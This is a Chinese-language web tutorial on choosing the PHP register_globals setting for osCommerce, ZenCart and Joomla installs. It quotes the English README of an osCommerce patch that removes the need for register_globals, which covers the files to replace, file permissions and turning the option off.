解決辦法:當然是自己建立 (/tmp or c: mp)目錄夾囉!
當然如果當初安裝時,選擇mysql【資料庫】就不會發生這種『鳥事』啦!

解開:register_globals應該是:ON或是OFF的疑惑

解開:register_globals應該是:ON或是OFF的疑惑

購物網站架設時:Oscommerce 安裝一開始,若是原始碼 register_globals = Off是無法安裝的。

如果你是租用虛擬主機(不能自己修改php.ini時)不妨考慮安裝:Twe-Commercs
因為Twe-Commercs剛好相反!register_globals = Off是可以安裝的!

購物網站架設時:ZenCart 安裝一開始,若是原始碼 register_globals = On 會出現安全問號。

入口內容站架設時:Joomla 安裝一開始,若是原始碼 register_globals = On  是無法安裝的。


那 register_globals 應該是:ON或是OFF才好呢?

用Google搜尋到這篇文章,或許可以解開大家的疑惑。

2006-09-05 PHP多項未指明的漏洞 ( 資料來源:SecurityFocus )
PHP 在zend_hash_del()的功能中發現一個弱點。對於信任使用unset函數的PHP程式,攻擊者可以用暴力法傳遞任意初始化的函數。
這個漏洞對於將參數register_globals預設為「開啟(enable) 」的系統影響特別明顯,在Red Hat Enterprise Linux中register_globals預設成「關閉 (disable)

因此要把register_globals設為On,又能安裝或是使用Oscommerce,可以下載patch檔後覆蓋。

它的 readme 說明檔如下:

引用:
CHANGES TO REMOVE register_globals REQUIREMENT - V 1.5 - Richard Bentley 01/09/2006
-----------------------------------------------------------------------------------

Before proceding, read the README file !

In this directory, you will find a set of files that have been pre-patched. The net result
is exactly the same as applying the patch instructions yourself.

There are 13 files in total that have replacements. These are as follows :

Admin...
---------
.../admin/products_attributes.php
.../admin/includes/application_top.php
.../admin/includes/functions/general.php
.../admin/includes/functions/sessions.php

On a default installation of OSC, the 'admin' directory is actually contained within the
'catalog' directory (ie .../catalog/admin/), but I have split it out here to make the
division clearer (as an aside, you will find that if you move admin/ out of catalog/,
it makes the admin section somewhat more straightforward to secure, but this is outside
the scope of this patch)

Catalogue...
------------
.../catalog/install/includes/application.php

NOTE: If you have already installed OSC (ie - run through the installation procedure),
---- then the above file may not exist (in which case you should not add it back in
with the replacement file); once installation of OSC is complete, you should
delete the whole of the .../catalog/install/ directory - it is not needed after
installation and having it hanging around is a security risk

.../catalog/includes/application_top.php
.../catalog/include/classes/order.php
.../catalog/includes/functions/general.php
.../catalog/includes/functions/gzip_compression.php
.../catalog/includes/functions/sessions.php
.../catalog/includes/languages/english/password_forgotten.php
.../catalog/includes/languages/espanol/password_forgotten.php
.../catalog/includes/languages/german/password_forgotten.php

NOTE: I have NOT included a pre-patched version of the easypopulate file. This is because
---- it will probably be out of date by the time you read this. Instead, if you need to
patch easypopulate (if it STILL needs patching, and by now it really should have been
reworked so that it doesn't need patching) then refer to the manual patching
instructions (the very last entry in the admin_patch text file will tell you what
you need to do - it's very simple... honest)

=======================================================
>>> WARNING <<<

These files are based on the MS 2.2 release, dated 17/09/2006 (ie - the
security/bugfix update #2 to the original MS 2.2). If you are using some other version
of OSC then I strongly suggest you apply this patch manually and NOT use these pre-patched
files. The exception to this is the security/bugfix release 13/11/2005; it is ok
to patch this version directly with these files; see the README file for more details

=======================================================
>>> WARNING <<<

If you have already applied some other changes (contributions/patches) to your OSC code
then make sure you are not blatting over those changes by copying these files over. If in
doubt then I strongly suggest you use the manual instructions in the 'patch_instructions'
directory and apply the patch line by line; despite what many people say, it really
doesn't take very long - it took me about 20 minutes!

=======================================================
INSTALLATION
------------

1/ Copy the above files to their appropriate places in your existing OSC code tree

2/ Make sure you set the permissions of the replacement files appropriately for the
environment you are using. If you fancy getting the shit hacked out of you then
feel free to set permissions of '777'. If you fancy something a tad more secure
then I suggest engaging brain and thinking about it :-)
If you don't KNOW how to set some sensible file pemissions then find yourself
a good text book and learn how to use your computer

3/ It's been mentioned in the README file already, but once you have made this
change, you MUST disable the register_globals option in php.ini

ie, in php.ini :

register_globals = Off

=======================================================

參考下載網頁: http://www.oscommerce.com/community/contributions,2097/category,all/search,register_globals

購物網站架設教學【網路補習班】教學基地:致力於收集各類購物網站教育資料及技術資訊,便於本人和廣大網友及店家查詢檢索,無論公司或個人認為本站存在侵權內容均可與本站聯繫,任何此類反饋資訊一經查明屬實後,將立即移除!